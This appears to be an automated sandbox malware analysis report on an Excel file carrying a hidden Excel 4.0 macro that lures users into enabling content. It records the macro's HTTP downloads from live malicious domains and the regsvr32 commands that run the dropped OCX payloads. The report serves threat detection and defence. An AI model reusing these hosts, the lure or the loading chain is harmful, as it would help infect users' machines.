Loading ...

Play interactive tourEdit tour

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Sample Name:counter-1248368226.xls
Analysis ID:532597
MD5:30a0db47a66a3d3173457755bb166529
SHA1:c852a219defe8ab726b72f8792386e35428b46dc
SHA256:bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2664 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2660 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2848 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1164 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
counter-1248368226.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x1deaa:$s1: Excel
  • 0x1ef56:$s1: Excel
  • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
counter-1248368226.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\counter-1248368226.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x1deaa:$s1: Excel
    • 0x1ef56:$s1: Excel
    • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\counter-1248368226.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2664, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2660

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: counter-1248368226.xlsReversingLabs: Detection: 40%
      Antivirus detection for URL or domainShow sources
      Source: https://playsis.com.br/Y~TAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSiAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/Avira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlinkAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL117.Avira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BN5V/tiynh.html5Avira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1B.bAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qhttAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BN5V/tiynh.htmlAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BNtAvira URL Cloud: Label: malware
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.22:49169 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.179.192.98:443
      Source: global trafficDNS query: name: greenflag.esp.br
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.179.192.98:443
      Source: excel.exeMemory has grown: Private usage: 4MB later: 30MB
      Source: global trafficHTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: greenflag.esp.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: noithat117.vnConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: playsis.com.brConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Joe Sandbox ViewIP Address: 162.241.2.78 162.241.2.78
      Source: Joe Sandbox ViewIP Address: 108.179.192.98 108.179.192.98
      Source: Joe Sandbox ViewIP Address: 103.28.36.171 103.28.36.171
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: EXCEL.EXE, 00000000.00000003.564246269.0000000007FFF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.774801999.0000000007FF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567317162.0000000007FFD000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comB equals www.linkedin.com (Linkedin)
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: EXCEL.EXE, 00000000.00000003.564246269.0000000007FFF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.774801999.0000000007FF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567317162.0000000007FFD000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: EXCEL.EXE, 00000000.00000002.775151480.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564294581.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567383807.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564281653.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567411737.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775255583.0000000008068000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: EXCEL.EXE, 00000000.00000002.775151480.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567383807.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564281653.0000000008043000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: EXCEL.EXE, 00000000.00000003.564294581.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567411737.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775255583.0000000008068000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: regsvr32.exe, 00000003.00000002.504300756.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443258094.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: regsvr32.exe, 00000003.00000002.503985491.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.441043592.0000000001CC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: regsvr32.exe, 00000003.00000002.504300756.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443258094.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: EXCEL.EXE, 00000000.00000003.564287009.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775190147.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567396088.0000000008058000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/
      Source: EXCEL.EXE, 00000000.00000003.564287009.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775190147.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567396088.0000000008058000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/s
      Source: EXCEL.EXE, 00000000.00000002.773658206.00000000058D2000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.html
      Source: EXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmpString found in binary or memory: https://noithat117.vn/
      Source: EXCEL.EXE, 00000000.00000002.773658206.00000000058D2000.00000004.00000001.sdmpString found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.html
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.boi
      Source: EXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/
      Source: EXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/Y~T
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL117.
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1B.b
      Source: EXCEL.EXE, 00000000.00000002.775298958.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564300874.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567427727.0000000008076000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink
      Source: EXCEL.EXE, 00000000.00000002.775298958.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564300874.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567427727.0000000008076000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html5
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BNt
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSi
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qhtt
      Source: EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.cre
      Source: EXCEL.EXE, 00000000.00000002.775151480.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564294581.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567383807.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564281653.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567411737.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775255583.0000000008068000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tiynh[1].htmJump to behavior
      Source: unknownDNS traffic detected: queries for: greenflag.esp.br
      Source: global trafficHTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: greenflag.esp.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: noithat117.vnConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: playsis.com.brConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.22:49169 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful - files from the lnterne 1' 1 View
      Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
      Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful - files from the lnterne -cted View.
      Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
      Source: Screenshot number: 12Screenshot OCR: Enable Editing Ik No RETURNQ or HALTQ funaon found on macro sheet. 18 19 I " I 20 (D PROTECTED V
      Source: Screenshot number: 12Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
      Source: Screenshot number: 16Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
      Source: Screenshot number: 16Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content If you are using a mobi
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 1Screenshot OCR: Enable Content DSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
      Source: Screenshot number: 20Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
      Source: Screenshot number: 20Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 Z
      Source: counter-1248368226.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor3
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor6
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor2
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor1
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor4
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor5
      Source: counter-1248368226.xlsOLE indicator, VBA macros: true
      Source: counter-1248368226.xls.0.drOLE indicator, VBA macros: true
      Source: FFC2.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: counter-1248368226.xlsReversingLabs: Detection: 40%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: counter-1248368226.xlsOLE indicator, Workbook stream: true
      Source: counter-1248368226.xls.0.drOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
